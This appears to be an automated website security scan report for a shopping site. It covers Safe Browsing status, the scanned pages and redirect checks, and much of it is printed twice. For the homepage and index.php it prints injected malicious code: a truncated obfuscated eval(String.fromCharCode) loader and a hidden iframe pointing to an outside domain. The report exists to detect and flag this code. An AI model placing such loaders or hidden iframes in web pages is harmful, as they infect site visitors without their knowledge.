Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=megablowoutsale.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://megablowoutsale.com/ | 200 OK Content-Length: 136374 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(String.fromCharCode(99,61,50,59,105,61,99,45,50,59,105,102,40,112,97,114,115,101,73,110,116,40,34,48,49,50,51,34,41,61,61,61,56,51,41,105,102,40,119,105,110,100,111,119,46,100,111,99,117,109,101,110,116,41,116,114,121,123,110,101,119,32,83,116,114,105,110,103,40,34,97,115,100,34,41,46,112,114,111,116,111,116,121,112,101,46,113,125,99,97,116,99,104,40,101,103,101,119,103,115,100,41,123,102,61,91,39,45,50,57,105,45,50,57,105,54,55,105,54,52,105,45,54,105,50,105,54,50,105,55,51,105,54,49,105,5 Decoded script: c=2;i=c-2;if(parseInt("0123")===83)if(window.document)try{new String("asd").prototype.q}catch(egewgsd){f=['-29i-29i67i64i-6i2i62i73i61i79i71i63i72i78i8i65i63i78i31i70i63i71i63i72i78i77i28i83i46i59i65i40i59i71i63i2i1i60i73i62i83i1i3i53i10i55i3i85i-25i-29i-29i-29i67i64i76i59i71i63i76i2i3i21i-25i-29i-29i87i-6i63i70i77i63i-6i85i-25i-29i-29i-29i62i73i61i79i71i63i72i78i8i81i76i67i78i63i2i-4i22i67i64i76i59i71i63i-6i77i76i61i23i1i66i78i78i74i20i9i9i59i62i7i72i63i78i81i73i76i69i13i12i16i8i67i72i9i70 <iframe src='http://ad-network326.in/lol/index.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://megablowoutsale.com/index.php?action=order&dc= | 200 OK Content-Length: 732 Content-Type: text/html | clean |
http://megablowoutsale.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://megablowoutsale.com/disclaimer.html | 404 Not Found Content-Length: 332 Content-Type: text/html | clean |
http://megablowoutsale.com/terms.html | 200 OK Content-Length: 8247 Content-Type: text/html | clean |
http://megablowoutsale.com/index.php | 200 OK Content-Length: 136374 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(String.fromCharCode(99,61,50,59,105,61,99,45,50,59,105,102,40,112,97,114,115,101,73,110,116,40,34,48,49,50,51,34,41,61,61,61,56,51,41,105,102,40,119,105,110,100,111,119,46,100,111,99,117,109,101,110,116,41,116,114,121,123,110,101,119,32,83,116,114,105,110,103,40,34,97,115,100,34,41,46,112,114,111,116,111,116,121,112,101,46,113,125,99,97,116,99,104,40,101,103,101,119,103,115,100,41,123,102,61,91,39,45,50,57,105,45,50,57,105,54,55,105,54,52,105,45,54,105,50,105,54,50,105,55,51,105,54,49,105,5 Decoded script: c=2;i=c-2;if(parseInt("0123")===83)if(window.document)try{new String("asd").prototype.q}catch(egewgsd){f=['-29i-29i67i64i-6i2i62i73i61i79i71i63i72i78i8i65i63i78i31i70i63i71i63i72i78i77i28i83i46i59i65i40i59i71i63i2i1i60i73i62i83i1i3i53i10i55i3i85i-25i-29i-29i-29i67i64i76i59i71i63i76i2i3i21i-25i-29i-29i87i-6i63i70i77i63i-6i85i-25i-29i-29i-29i62i73i61i79i71i63i72i78i8i81i76i67i78i63i2i-4i22i67i64i76i59i71i63i-6i77i76i61i23i1i66i78i78i74i20i9i9i59i62i7i72i63i78i81i73i76i69i13i12i16i8i67i72i9i70 <iframe src='http://ad-network326.in/lol/index.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://megablowoutsale.com/privacy.html | 404 Not Found Content-Length: 329 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: megablowoutsale.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 11 Jan 2015 02:37:27 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=96e235ef77b535eca6876432ccc32122; path=/
X-Powered-By: PHP/5.4.35
GET / HTTP/1.1
Host: megablowoutsale.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 11 Jan 2015 02:37:27 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=96e235ef77b535eca6876432ccc32122; path=/
X-Powered-By: PHP/5.4.35
Second query (visit from search engine):
GET / HTTP/1.1
Host: megablowoutsale.com
Referer: http://www.google.com/search?q=megablowoutsale.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: megablowoutsale.com
Referer: http://www.google.com/search?q=megablowoutsale.com
Result:
The result is similar to the first query. There are no suspicious redirects found.